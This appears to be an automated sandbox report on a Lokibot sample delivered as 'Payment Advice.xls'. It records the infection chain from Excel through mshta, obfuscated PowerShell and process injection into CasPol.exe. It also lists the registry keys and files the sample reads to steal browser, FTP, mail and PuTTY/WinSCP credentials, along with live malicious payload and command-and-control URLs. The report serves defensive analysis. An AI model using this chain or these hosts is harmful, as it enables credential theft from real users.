              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

              Remote Access Functionality

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information121
              Scripting              		Valid Accounts23
              Exploitation for Client Execution              		121
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services1
              Browser Session Hijacking              		5
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts121
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		211
              Process Injection              		11
              Obfuscated Files or Information              		1
              Credentials in Registry              		14
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts4
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Install Root Certificate              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares11
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS21
              Virtualization/Sandbox Evasion              		Distributed Component Object Model1
              Clipboard Data              		15
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Remote System Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
              Process Injection              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1544327 Sample: Payment Advice.xls Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 93 Suricata IDS alerts for network traffic 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 Yara detected HtmlPhish44 2->97 99 15 other signatures 2->99 11 EXCEL.EXE 59 33 2->11         started        process3 dnsIp4 85 198.46.178.155, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->85 87 acesso.run 172.67.162.95, 443, 49163, 49169 CLOUDFLARENETUS United States 11->87 69 C:\Users\user\...\Payment Advice.xls (copy), Composite 11->69 dropped 71 nicelookgirlfrined...gnstodoforme[1].hta, HTML 11->71 dropped 133 Microsoft Office drops suspicious files 11->133 16 mshta.exe 10 11->16         started        20 mshta.exe 10 11->20         started        file5 signatures6 process7 dnsIp8 73 104.21.74.191, 443, 49165 CLOUDFLARENETUS United States 16->73 75 acesso.run 16->75 89 Suspicious powershell command line found 16->89 91 PowerShell case anomaly found 16->91 22 powershell.exe 24 16->22         started        77 acesso.run 20->77 26 powershell.exe 20->26         started        signatures9 process10 file11 65 seethebestthingswi...ngsforgetmeback.vbS, Unicode 22->65 dropped 67 C:\Users\user\AppData\...\1nxbdaco.cmdline, Unicode 22->67 dropped 105 Suspicious powershell command line found 22->105 107 Obfuscated command line found 22->107 28 wscript.exe 1 22->28         started        31 powershell.exe 4 22->31         started        33 csc.exe 2 22->33         started        36 wscript.exe 26->36         started        38 csc.exe 26->38         started        40 powershell.exe 26->40         started        signatures12 process13 file14 121 Bypasses PowerShell execution policy 28->121 123 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->123 125 Suspicious execution chain found 28->125 42 powershell.exe 2 28->42         started        127 Installs new ROOT certificates 31->127 61 C:\Users\user\AppData\Local\...\1nxbdaco.dll, PE32 33->61 dropped 45 cvtres.exe 33->45         started        129 Suspicious powershell command line found 36->129 131 Wscript starts Powershell (via cmd or directly) 36->131 47 powershell.exe 36->47         started        63 C:\Users\user\AppData\Local\...\vbdaauwq.dll, PE32 38->63 dropped 49 cvtres.exe 38->49         started        signatures15 process16 signatures17 51 powershell.exe 12 4 42->51         started        109 Suspicious powershell command line found 47->109 111 Obfuscated command line found 47->111 54 powershell.exe 47->54         started        process18 dnsIp19 79 drive.google.com 142.250.184.206, 443, 49168, 49175 GOOGLEUS United States 51->79 81 drive.usercontent.google.com 142.250.185.97, 443, 49173, 49176 GOOGLEUS United States 51->81 101 Writes to foreign memory regions 54->101 103 Injects a PE file into a foreign processes 54->103 57 CasPol.exe 54->57         started        signatures20 process21 dnsIp22 83 94.156.177.220, 49179, 49180, 49181 NET1-ASBG Bulgaria 57->83 113 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 57->113 115 Tries to steal Mail credentials (via file / registry access) 57->115 117 Tries to harvest and steal ftp login credentials 57->117 119 Tries to harvest and steal browser information (history, passwords, etc) 57->119 signatures23

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Payment Advice.xls11%ReversingLabs
              Payment Advice.xls100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.entrust.net/server1.crl00%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://go.micros0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://secure.comodo.com/CPS00%URL Reputationsafe
              http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              acesso.run
              		172.67.162.95
              		truefalse
                		unknown
                drive.google.com
                		142.250.184.206
                		truefalse
                  		unknown
                  drive.usercontent.google.com
                  		142.250.185.97
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://acesso.run/j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologisfalse
                      		unknown
                      http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htatrue
                        		unknown
                        http://94.156.177.220/simple/five/fre.phptrue
                          		unknown
                          http://198.46.178.155/422/seethebestthingswithgoodthingsforgetmebackwithbestthings.tIFtrue
                            		unknown
                            http://198.46.178.155/422/SMPRGSSR.txttrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://acesso.run/Jmshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
